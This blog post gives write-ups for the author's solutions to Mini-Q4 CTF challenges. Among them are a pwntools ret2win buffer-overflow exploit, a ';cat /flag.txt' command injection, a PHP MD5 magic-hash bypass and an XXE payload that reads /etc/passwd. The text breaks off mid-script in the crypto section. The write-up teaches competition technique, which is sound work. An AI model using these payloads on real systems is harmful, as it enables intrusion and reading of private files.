<!DOCTYPE html>
<html lang="en"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">mini-Q4 CTF Solutions | abund4nt&#39;s Blog</title>
<meta property="og:title" content="mini-Q4 CTF Solutions | abund4nt&#39;s Blog" />
<meta name="twitter:title" content="mini-Q4 CTF Solutions | abund4nt&#39;s Blog" />
<meta itemprop="name" content="mini-Q4 CTF Solutions | abund4nt&#39;s Blog" />
<meta name="application-name" content="mini-Q4 CTF Solutions | abund4nt&#39;s Blog" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="en" />
<meta name="language" content="en" />

  <link rel="alternate" hreflang="en" href="https://abund4nt.github.io/posts/mini-q4-solutions/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=0001-01-01T00:00:00Z />
    <meta property="article:published_time" content=0001-01-01T00:00:00Z />
    <meta property="og:url" content="https://abund4nt.github.io/posts/mini-q4-solutions/" />

    
    <meta property="og:article:author" content="" />
    <meta property="article:author" content="" />
    <meta name="author" content="" />
    
    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "mini-Q4 CTF Solutions",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "0001-01-01",
        "description": "",
        "wordCount":  1432 ,
        "mainEntityOfPage": "True",
        "dateModified": "0001-01-01",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "abund4nt\u0027s Blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.135.0">

    
    <meta property="og:url" content="https://abund4nt.github.io/posts/mini-q4-solutions/">
  <meta property="og:site_name" content="abund4nt&#39;s Blog">
  <meta property="og:title" content="mini-Q4 CTF Solutions">
  <meta property="og:description" content="In this post I will share the solutions to the challenges I solved in the Mini-Q4 CTF, played on December 20, 2024. I am pleased to announce that I got the first place in this event, which fills me with satisfaction and motivation.
Below, I will explain the approaches and techniques I used to solve each of the challenges presented.
principiante AprendeRE We are given a binary that we must reverse, analyzing its functions we see that the function check_password() performs an xor with the string wl]qkorng]PG##=#, by performing the reverse we can get the password and solve the challenge.">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="mini-Q4 CTF Solutions">
  <meta name="twitter:description" content="In this post I will share the solutions to the challenges I solved in the Mini-Q4 CTF, played on December 20, 2024. I am pleased to announce that I got the first place in this event, which fills me with satisfaction and motivation.
Below, I will explain the approaches and techniques I used to solve each of the challenges presented.
principiante AprendeRE We are given a binary that we must reverse, analyzing its functions we see that the function check_password() performs an xor with the string wl]qkorng]PG##=#, by performing the reverse we can get the password and solve the challenge.">


    

    <link rel="canonical" href="https://abund4nt.github.io/posts/mini-q4-solutions/">
    <link href="/style.min.fb52b3b9d7a882537156d66e855d8ac8dc4b4bbfa5859dd4b287ce6ad7f9a0ae.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://abund4nt.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/katex.min.css"
    integrity="sha512-fHwaWebuwA7NSF5Qg/af4UeDx9XqUpYpOGgubo3yWu+b2IQR4UeQwbb42Ti7gVAjNtVoI/I9TEoYeu9omwcC6g==" crossorigin="anonymous" crossorigin="anonymous" />


<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/katex.min.js"
    integrity="sha512-LQNxIMR5rXv7o+b1l8+N1EZMfhG7iFZ9HhnbJkTp4zjNr5Wvst75AqUeFDxeRUa7l5vEDyUiAip//r+EFLLCyA=="
    crossorigin="anonymous"></script>


<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.9/dist/contrib/auto-render.min.js"
    integrity="sha512-iWiuBS5nt6r60fCz26Nd0Zqe0nbk1ZTIQbl3Kv7kYsX+yKMUFHzjaH2+AnM6vp2Xs+gNmaBAVWJjSmuPw76Efg==" crossorigin="anonymous" onload="renderMathInElement(document.body, {
      delimiters: [
        {left: '$$', right: '$$', display: true},
        {left: '$', right: '$', display: false}
      ]
    });"></script>

    
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://abund4nt.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        about
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        posts
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">mini-Q4 CTF Solutions</h1>
                
                
            </header>
            
            <div class="page-content">
                <p>In this post I will share the solutions to the challenges I solved in the Mini-Q4 CTF, played on December 20, 2024. I am pleased to announce that I got the first place in this event, which fills me with satisfaction and motivation.</p>
<p><img src="https://i.imgur.com/00wdeOq.jpeg" alt=""></p>
<p>Below, I will explain the approaches and techniques I used to solve each of the challenges presented.</p>
<h1 id="principiante">principiante</h1>
<h2 id="aprendere">AprendeRE</h2>
<p>We are given a binary that we must reverse, analyzing its functions we see that the function <code>check_password()</code> performs an xor with the string <code>wl]qkorng]PG##=#</code>, by performing the reverse we can get the password and solve the challenge.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s2">&#34;wl]qkorng]PG##=#&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">password</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">^</span> <span class="mi">2</span><span class="p">)</span> <span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">target</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">password</span><span class="p">)</span>
</span></span></code></pre></div><p>When we execute it we obtain the password that corresponds to the flag.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="err">$</span> <span class="n">python3</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span>
</span></span><span class="line"><span class="cl"><span class="n">un_simple_RE</span><span class="err">!!?!</span>
</span></span></code></pre></div><h2 id="ret2pwn">ret2pwn</h2>
<p>This challenge is the typical <code>ret2win</code> challenge, we are given a binary vulnerable to <em>Buffer Overflow</em> with a <code>win()</code> function which returns a shell. The binary in its <code>main()</code> function calls the <code>vuln()</code> function.</p>
<pre><font color="#DC322F"><b>gef➤  </b></font>disass main
Dump of assembler code for function <font color="#B58900">main</font>:
   <font color="#268BD2">0x0000000000401240</font> &lt;+0&gt;:	<font color="#859900">endbr64</font>
   <font color="#268BD2">0x0000000000401244</font> &lt;+4&gt;:	<font color="#859900">push   </font><font color="#DC322F">rbp</font>
   <font color="#268BD2">0x0000000000401245</font> &lt;+5&gt;:	<font color="#859900">mov    </font><font color="#DC322F">rbp</font>,<font color="#DC322F">rsp</font>
   <font color="#268BD2">0x0000000000401248</font> &lt;+8&gt;:	<font color="#859900">mov    </font><font color="#DC322F">eax</font>,<font color="#268BD2">0x0</font>
   <font color="#268BD2">0x000000000040124d</font> &lt;+13&gt;:	<font color="#859900">call   </font><font color="#268BD2">0x401196</font> &lt;<font color="#B58900">setup</font>&gt;
   <font color="#268BD2">0x0000000000401252</font> &lt;+18&gt;:	<font color="#859900">mov    </font><font color="#DC322F">eax</font>,<font color="#268BD2">0x0</font>
   <font color="#268BD2">0x0000000000401257</font> &lt;+23&gt;:	<font color="#859900">call   </font><font color="#268BD2">0x4011f7</font> &lt;<font color="#B58900">vuln</font>&gt;
   <font color="#268BD2">0x000000000040125c</font> &lt;+28&gt;:	<font color="#859900">mov    </font><font color="#DC322F">eax</font>,<font color="#268BD2">0x0</font>
   <font color="#268BD2">0x0000000000401261</font> &lt;+33&gt;:	<font color="#859900">pop    </font><font color="#DC322F">rbp</font>
   <font color="#268BD2">0x0000000000401262</font> &lt;+34&gt;:	<font color="#859900">ret</font>
End of assembler dump.
</pre>
<p>The <code>vuln()</code> function is vulnerable to <em>Buffer Overflow</em> since it defines a buffer of 256 bytes in size and reads up to 512 bytes, giving us room to overflow the stack.</p>
<pre><font color="#DC322F"><b>gef➤  </b></font>disass vuln
Dump of assembler code for function <font color="#B58900">vuln</font>:
   <font color="#268BD2">0x00000000004011f7</font> &lt;+0&gt;:	<font color="#859900">endbr64</font>
   <font color="#268BD2">0x00000000004011fb</font> &lt;+4&gt;:	<font color="#859900">push   </font><font color="#DC322F">rbp</font>
   <font color="#268BD2">0x00000000004011fc</font> &lt;+5&gt;:	<font color="#859900">mov    </font><font color="#DC322F">rbp</font>,<font color="#DC322F">rsp</font>
   <font color="#268BD2">0x00000000004011ff</font> &lt;+8&gt;:	<font color="#859900">sub    </font><font color="#DC322F">rsp</font>,<font color="#268BD2">0x100</font>
   <font color="#268BD2">0x0000000000401206</font> &lt;+15&gt;:	<font color="#859900">lea    </font><font color="#DC322F">rax</font>,[<font color="#DC322F">rip</font>+<font color="#268BD2">0xdff</font>]<font color="#9F9B8E">        # 0x40200c</font>
   <font color="#268BD2">0x000000000040120d</font> &lt;+22&gt;:	<font color="#859900">mov    </font><font color="#DC322F">rdi</font>,<font color="#DC322F">rax</font>
   <font color="#268BD2">0x0000000000401210</font> &lt;+25&gt;:	<font color="#859900">call   </font><font color="#268BD2">0x401070</font> &lt;<font color="#B58900">puts@plt</font>&gt;
   <font color="#268BD2">0x0000000000401215</font> &lt;+30&gt;:	<font color="#859900">lea    </font><font color="#DC322F">rax</font>,[<font color="#DC322F">rbp</font><font color="#268BD2">-0x100</font>]
   <font color="#268BD2">0x000000000040121c</font> &lt;+37&gt;:	<font color="#859900">mov    </font><font color="#DC322F">edx</font>,<font color="#268BD2">0x200</font>
   <font color="#268BD2">0x0000000000401221</font> &lt;+42&gt;:	<font color="#859900">mov    </font><font color="#DC322F">rsi</font>,<font color="#DC322F">rax</font>
   <font color="#268BD2">0x0000000000401224</font> &lt;+45&gt;:	<font color="#859900">mov    </font><font color="#DC322F">edi</font>,<font color="#268BD2">0x0</font>
   <font color="#268BD2">0x0000000000401229</font> &lt;+50&gt;:	<font color="#859900">call   </font><font color="#268BD2">0x401090</font> &lt;<font color="#B58900">read@plt</font>&gt;
   <font color="#268BD2">0x000000000040122e</font> &lt;+55&gt;:	<font color="#859900">lea    </font><font color="#DC322F">rax</font>,[<font color="#DC322F">rip</font>+<font color="#268BD2">0xde3</font>]<font color="#9F9B8E">        # 0x402018</font>
   <font color="#268BD2">0x0000000000401235</font> &lt;+62&gt;:	<font color="#859900">mov    </font><font color="#DC322F">rdi</font>,<font color="#DC322F">rax</font>
   <font color="#268BD2">0x0000000000401238</font> &lt;+65&gt;:	<font color="#859900">call   </font><font color="#268BD2">0x401070</font> &lt;<font color="#B58900">puts@plt</font>&gt;
   <font color="#268BD2">0x000000000040123d</font> &lt;+70&gt;:	<font color="#859900">nop</font>
   <font color="#268BD2">0x000000000040123e</font> &lt;+71&gt;:	<font color="#859900">leave</font>
   <font color="#268BD2">0x000000000040123f</font> &lt;+72&gt;:	<font color="#859900">ret</font>
End of assembler dump.</pre>
<p>To sum up:</p>
<ul>
<li>We must exploit the <em>Buffer Overflow</em> until we overflow the stack.</li>
<li>Once the stack is overflowed we must align the stack with a RET gadget (we use <code>ROPgadget</code> for this).</li>
<li>We pass the memory address of the <code>win()</code> function and get a shell.</li>
</ul>
<p>With this exploit we solve the challenge.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;0.cloud.chals.io&#39;</span><span class="p">,</span> <span class="mi">23438</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">offset</span> <span class="o">=</span> <span class="mi">264</span>
</span></span><span class="line"><span class="cl"><span class="n">junk</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="n">offset</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">junk</span>                          <span class="c1"># padding</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x000000000040101a</span><span class="p">)</span>      <span class="c1"># ret</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x00000000004011dd</span><span class="p">)</span>      <span class="c1"># win()</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</span></span></code></pre></div><p>When executed, it returns a shell.</p>
<pre>$ python3 solve.py 
[<font color="#859900"><b>+</b></font>] Opening connection to 0.cloud.chals.io on port 23438: Done
[<font color="#268BD2"><b>*</b></font>] Switching to interactive mode
A donde? : 

ok, let&apos;s go!

<font color="#DC322F"><b>$</b></font> ls
flag.txt
ret2pwn
<font color="#DC322F"><b>$</b></font> cat flag.txt
q4{un_simple_ret2pwn_para_apr3nder!}</pre>
<h2 id="just-decode-it">Just Decode it!</h2>
<p>We are given a string encoded in base64, we decode it and see that it is in hexadecimal, decode it again and get the flag, use Cyberchef for this.</p>
<p><img src="https://i.imgur.com/EMPXtA2.png" alt=""></p>
<h2 id="borrado">Borrado</h2>
<p>The description of the challenge is as follows.</p>
<pre tabindex="0"><code>Anoche me tome unos tragos y quede borrado, ayudame a recuperar mi memoria.

Si quieres aprender a resolver retos de tipo Forense, este challenge es un buen comienzo para ti!
</code></pre><p>We are given an <code>.img</code> and when doing a strings you can see the flag.</p>
<pre tabindex="0"><code>$ strings challenge.img
...
...
...
q4{l0_borrado_nunca_esta_borrado}
</code></pre><h2 id="alive">Alive</h2>
<p>Web challenge, command injection with the typical <code>;+cat+/flag.txt</code>.</p>
<p><img src="https://i.imgur.com/fKh93mG.png" alt=""></p>
<h1 id="web">web</h1>
<h2 id="al-choque">Al choque!</h2>
<p>We were given the source code of the application.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="k">include</span><span class="p">(</span><span class="s2">&#34;flag.php&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;secret&#39;</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nx">md5</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;secret&#39;</span><span class="p">])</span> <span class="o">==</span> <span class="s1">&#39;0e830400451993494058024219903391&#39;</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">print</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">exit</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">print</span><span class="p">(</span><span class="s2">&#34;No hay flags aca!&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="k">exit</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err">
</span></span></span></code></pre></div><p>We see that it includes the file <code>flag.php</code> which contains the flag, then with an if statement it validates if the secret that we enter encrypted to MD5 is equal to <code>0e830400451993494058024219903391</code>, if this is fulfilled it returns the flag, if not it gives us an error. Searching in Google I realized that the hash <code>0e83040045451993494058024219903391</code> was the string <code>QNKCDZO</code>, so with that I could solve the challenge.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">$ curl -X GET https://q4-alchoque.chals.io/<span class="se">\?</span>secret<span class="se">\=</span>QNKCDZO
</span></span><span class="line"><span class="cl">q4<span class="o">{</span>super_f4c1l_gg_compar1s0n_webwebweb<span class="o">}</span>
</span></span></code></pre></div><h2 id="el_fr33st4lero">El_Fr33st4lero</h2>
<p>This challenge was one of the ones I liked the most! I spent a lot of time trying to solve it.</p>
<p>When entering we could see a video of the glorious Matiah Chinaski rapping, when we saw the source code we saw a string that caught my attention <code>//cat</code>, also the video was called <code>cat.mp4</code> so I felt it had to do something with animals. Since I did not find anything I decided to do fuzzing using <code>wfuzz</code> with animal names and extensions, with this command I found the file <code>gato.html</code>.</p>
<pre tabindex="0"><code>wfuzz -c -t 50 -u https://q4-el-fr33st4lero.chals.io/FUZZFUZ2Z -z file,animales.txt -z file,File-Extensions-Wordlist.txt --hc=404,403
</code></pre><p>When entering the file we saw a registration form.</p>
<p><img src="https://i.imgur.com/ssfCAnD.png" alt=""></p>
<p>When filling the form and intercepting the request we see that the data is processed in XML, I automatically knew that this was an XXE so I injected the typical DOCTYPE and I could read files.</p>
<pre tabindex="0"><code>&lt;!DOCTYPE foo [&lt;!ENTITY example SYSTEM &#34;/etc/passwd&#34;&gt; ]&gt;
</code></pre><p><img src="https://i.imgur.com/3t9GaN6.png" alt=""></p>
<p>Then I was wasting a lot of time looking for the flag, until it occurred to me to look in <code>/etc/</code> and sure enough, there it was!</p>
<p><img src="https://i.imgur.com/hBaAk5h.png" alt=""></p>
<h1 id="crypto">crypto</h1>
<h2 id="babycrypto">babycrypto</h2>
<p>We receive the encrypted flag and the source code that encrypts it.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">flag</span> <span class="kn">import</span> <span class="n">FLAG</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">enc</span><span class="p">(</span><span class="n">plaintext</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">message</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">plaintext</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">char</span><span class="o">.</span><span class="n">isalpha</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="n">char</span><span class="o">.</span><span class="n">isupper</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">                <span class="n">shifted</span> <span class="o">=</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
</span></span><span class="line"><span class="cl">                <span class="n">message</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">shifted</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;A&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="k">elif</span> <span class="n">char</span><span class="o">.</span><span class="n">islower</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">                <span class="n">shifted</span> <span class="o">=</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;a&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
</span></span><span class="line"><span class="cl">                <span class="n">message</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">shifted</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;a&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">message</span> <span class="o">+=</span> <span class="n">char</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">message</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">message</span> <span class="o">=</span> <span class="n">enc</span><span class="p">(</span><span class="n">FLAG</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Write the encrypted FLAG to an output file</span>
</span></span><span class="line"><span class="cl"><span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;message.txt&#34;</span><span class="p">,</span> <span class="s2">&#34;w&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">message</span><span class="p">)</span>
</span></span></code></pre></div><p>Define an <code>enc()</code> function which encrypts the message using the typical cesar modulo 26 cipher, just write the inverse and the challenge can be solved.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dec</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">plaintext</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">ciphertext</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">char</span><span class="o">.</span><span class="n">isalpha</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="n">char</span><span class="o">.</span><span class="n">isupper</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">                <span class="n">shifted</span> <span class="o">=</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;A&#39;</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
</span></span><span class="line"><span class="cl">                <span class="n">plaintext</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">shifted</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;A&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="k">elif</span> <span class="n">char</span><span class="o">.</span><span class="n">islower</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">                <span class="n">shifted</span> <span class="o">=</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">)</span> <span class="o">-</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;a&#39;</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">26</span>
</span></span><span class="line"><span class="cl">                <span class="n">plaintext</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">shifted</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;a&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">plaintext</span> <span class="o">+=</span> <span class="n">char</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">plaintext</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">ciphertext</span> <span class="o">=</span> <span class="s2">&#34;uo_vq4rs_lbjbgc_frjt_knbnzrbt_IQ_WXAYIUZC_G4&#34;</span>
